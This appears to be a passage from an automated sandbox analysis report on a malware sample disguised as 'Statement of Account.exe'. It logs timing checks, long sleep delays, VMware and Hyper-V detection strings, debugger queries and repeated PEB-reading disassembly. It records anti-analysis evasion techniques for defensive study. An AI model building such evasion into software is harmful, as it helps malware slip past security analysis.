          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 3089904 second address: 308990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 3089B6E second address: 3089B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 809904 second address: 80990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 809B6E second address: 809B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory allocated: 15D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory allocated: 9400000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory allocated: A400000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory allocated: A610000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory allocated: B610000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory allocated: 91E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory allocated: A1E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory allocated: A3E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory allocated: B3E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Users\user\Desktop\Statement of Account.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7796Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1722Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 393Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9551Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 885Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEWindow / User API: threadDelayed 3741
          Source: C:\Windows\SysWOW64\NETSTAT.EXEWindow / User API: threadDelayed 6230
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 1.7 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 1.4 %
          Source: C:\Users\user\Desktop\Statement of Account.exe TID: 6768Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6744Thread sleep count: 393 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6744Thread sleep time: -786000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6744Thread sleep count: 9551 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6744Thread sleep time: -19102000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe TID: 4484Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7160Thread sleep count: 3741 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7160Thread sleep time: -7482000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7160Thread sleep count: 6230 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7160Thread sleep time: -12460000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\Statement of Account.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000007.00000002.4171986519.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000007.00000002.4171222123.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000007.00000002.4168419021.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000007.00000002.4171986519.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000007.00000000.1732420107.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000007.00000003.3106013132.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000007.00000002.4171222123.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000007.00000002.4171222123.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4171222123.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000007.00000003.3106013132.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000007.00000002.4168419021.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000007.00000000.1732420107.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000007.00000000.1743570907.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000007.00000000.1732420107.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0040ACE0 LdrLoadDll,6_2_0040ACE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E5CF mov eax, dword ptr fs:[00000030h]6_2_05C7E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E5CF mov eax, dword ptr fs:[00000030h]6_2_05C7E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C465D0 mov eax, dword ptr fs:[00000030h]6_2_05C465D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A5D0 mov eax, dword ptr fs:[00000030h]6_2_05C7A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7A5D0 mov eax, dword ptr fs:[00000030h]6_2_05C7A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E5E7 mov eax, dword ptr fs:[00000030h]6_2_05C6E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E5E7 mov eax, dword ptr fs:[00000030h]6_2_05C6E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E5E7 mov eax, dword ptr fs:[00000030h]6_2_05C6E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E5E7 mov eax, dword ptr fs:[00000030h]6_2_05C6E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E5E7 mov eax, dword ptr fs:[00000030h]6_2_05C6E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E5E7 mov eax, dword ptr fs:[00000030h]6_2_05C6E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E5E7 mov eax, dword ptr fs:[00000030h]6_2_05C6E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E5E7 mov eax, dword ptr fs:[00000030h]6_2_05C6E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C425E0 mov eax, dword ptr fs:[00000030h]6_2_05C425E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C5ED mov eax, dword ptr fs:[00000030h]6_2_05C7C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C5ED mov eax, dword ptr fs:[00000030h]6_2_05C7C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42582 mov eax, dword ptr fs:[00000030h]6_2_05C42582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42582 mov ecx, dword ptr fs:[00000030h]6_2_05C42582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C74588 mov eax, dword ptr fs:[00000030h]6_2_05C74588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E59C mov eax, dword ptr fs:[00000030h]6_2_05C7E59C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC05A7 mov eax, dword ptr fs:[00000030h]6_2_05CC05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC05A7 mov eax, dword ptr fs:[00000030h]6_2_05CC05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC05A7 mov eax, dword ptr fs:[00000030h]6_2_05CC05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C645B1 mov eax, dword ptr fs:[00000030h]6_2_05C645B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C645B1 mov eax, dword ptr fs:[00000030h]6_2_05C645B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C48550 mov eax, dword ptr fs:[00000030h]6_2_05C48550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C48550 mov eax, dword ptr fs:[00000030h]6_2_05C48550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7656A mov eax, dword ptr fs:[00000030h]6_2_05C7656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7656A mov eax, dword ptr fs:[00000030h]6_2_05C7656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7656A mov eax, dword ptr fs:[00000030h]6_2_05C7656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD6500 mov eax, dword ptr fs:[00000030h]6_2_05CD6500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14500 mov eax, dword ptr fs:[00000030h]6_2_05D14500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14500 mov eax, dword ptr fs:[00000030h]6_2_05D14500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14500 mov eax, dword ptr fs:[00000030h]6_2_05D14500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14500 mov eax, dword ptr fs:[00000030h]6_2_05D14500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14500 mov eax, dword ptr fs:[00000030h]6_2_05D14500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14500 mov eax, dword ptr fs:[00000030h]6_2_05D14500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14500 mov eax, dword ptr fs:[00000030h]6_2_05D14500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50535 mov eax, dword ptr fs:[00000030h]6_2_05C50535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50535 mov eax, dword ptr fs:[00000030h]6_2_05C50535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50535 mov eax, dword ptr fs:[00000030h]6_2_05C50535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50535 mov eax, dword ptr fs:[00000030h]6_2_05C50535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50535 mov eax, dword ptr fs:[00000030h]6_2_05C50535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50535 mov eax, dword ptr fs:[00000030h]6_2_05C50535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E53E mov eax, dword ptr fs:[00000030h]6_2_05C6E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E53E mov eax, dword ptr fs:[00000030h]6_2_05C6E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E53E mov eax, dword ptr fs:[00000030h]6_2_05C6E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E53E mov eax, dword ptr fs:[00000030h]6_2_05C6E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6E53E mov eax, dword ptr fs:[00000030h]6_2_05C6E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C404E5 mov ecx, dword ptr fs:[00000030h]6_2_05C404E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFA49A mov eax, dword ptr fs:[00000030h]6_2_05CFA49A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C464AB mov eax, dword ptr fs:[00000030h]6_2_05C464AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C744B0 mov ecx, dword ptr fs:[00000030h]6_2_05C744B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCA4B0 mov eax, dword ptr fs:[00000030h]6_2_05CCA4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E443 mov eax, dword ptr fs:[00000030h]6_2_05C7E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E443 mov eax, dword ptr fs:[00000030h]6_2_05C7E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E443 mov eax, dword ptr fs:[00000030h]6_2_05C7E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E443 mov eax, dword ptr fs:[00000030h]6_2_05C7E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E443 mov eax, dword ptr fs:[00000030h]6_2_05C7E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E443 mov eax, dword ptr fs:[00000030h]6_2_05C7E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E443 mov eax, dword ptr fs:[00000030h]6_2_05C7E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E443 mov eax, dword ptr fs:[00000030h]6_2_05C7E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFA456 mov eax, dword ptr fs:[00000030h]6_2_05CFA456
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6245A mov eax, dword ptr fs:[00000030h]6_2_05C6245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3645D mov eax, dword ptr fs:[00000030h]6_2_05C3645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCC460 mov ecx, dword ptr fs:[00000030h]6_2_05CCC460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6A470 mov eax, dword ptr fs:[00000030h]6_2_05C6A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6A470 mov eax, dword ptr fs:[00000030h]6_2_05C6A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6A470 mov eax, dword ptr fs:[00000030h]6_2_05C6A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C78402 mov eax, dword ptr fs:[00000030h]6_2_05C78402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C78402 mov eax, dword ptr fs:[00000030h]6_2_05C78402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C78402 mov eax, dword ptr fs:[00000030h]6_2_05C78402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3E420 mov eax, dword ptr fs:[00000030h]6_2_05C3E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3E420 mov eax, dword ptr fs:[00000030h]6_2_05C3E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3E420 mov eax, dword ptr fs:[00000030h]6_2_05C3E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3C427 mov eax, dword ptr fs:[00000030h]6_2_05C3C427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6420 mov eax, dword ptr fs:[00000030h]6_2_05CC6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6420 mov eax, dword ptr fs:[00000030h]6_2_05CC6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6420 mov eax, dword ptr fs:[00000030h]6_2_05CC6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6420 mov eax, dword ptr fs:[00000030h]6_2_05CC6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6420 mov eax, dword ptr fs:[00000030h]6_2_05CC6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6420 mov eax, dword ptr fs:[00000030h]6_2_05CC6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6420 mov eax, dword ptr fs:[00000030h]6_2_05CC6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4C7C0 mov eax, dword ptr fs:[00000030h]6_2_05C4C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC07C3 mov eax, dword ptr fs:[00000030h]6_2_05CC07C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C627ED mov eax, dword ptr fs:[00000030h]6_2_05C627ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C627ED mov eax, dword ptr fs:[00000030h]6_2_05C627ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C627ED mov eax, dword ptr fs:[00000030h]6_2_05C627ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCE7E1 mov eax, dword ptr fs:[00000030h]6_2_05CCE7E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C447FB mov eax, dword ptr fs:[00000030h]6_2_05C447FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C447FB mov eax, dword ptr fs:[00000030h]6_2_05C447FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE678E mov eax, dword ptr fs:[00000030h]6_2_05CE678E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C407AF mov eax, dword ptr fs:[00000030h]6_2_05C407AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF47A0 mov eax, dword ptr fs:[00000030h]6_2_05CF47A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7674D mov esi, dword ptr fs:[00000030h]6_2_05C7674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7674D mov eax, dword ptr fs:[00000030h]6_2_05C7674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7674D mov eax, dword ptr fs:[00000030h]6_2_05C7674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCE75D mov eax, dword ptr fs:[00000030h]6_2_05CCE75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C40750 mov eax, dword ptr fs:[00000030h]6_2_05C40750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82750 mov eax, dword ptr fs:[00000030h]6_2_05C82750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82750 mov eax, dword ptr fs:[00000030h]6_2_05C82750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4755 mov eax, dword ptr fs:[00000030h]6_2_05CC4755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C48770 mov eax, dword ptr fs:[00000030h]6_2_05C48770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C700 mov eax, dword ptr fs:[00000030h]6_2_05C7C700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C40710 mov eax, dword ptr fs:[00000030h]6_2_05C40710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C70710 mov eax, dword ptr fs:[00000030h]6_2_05C70710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C720 mov eax, dword ptr fs:[00000030h]6_2_05C7C720
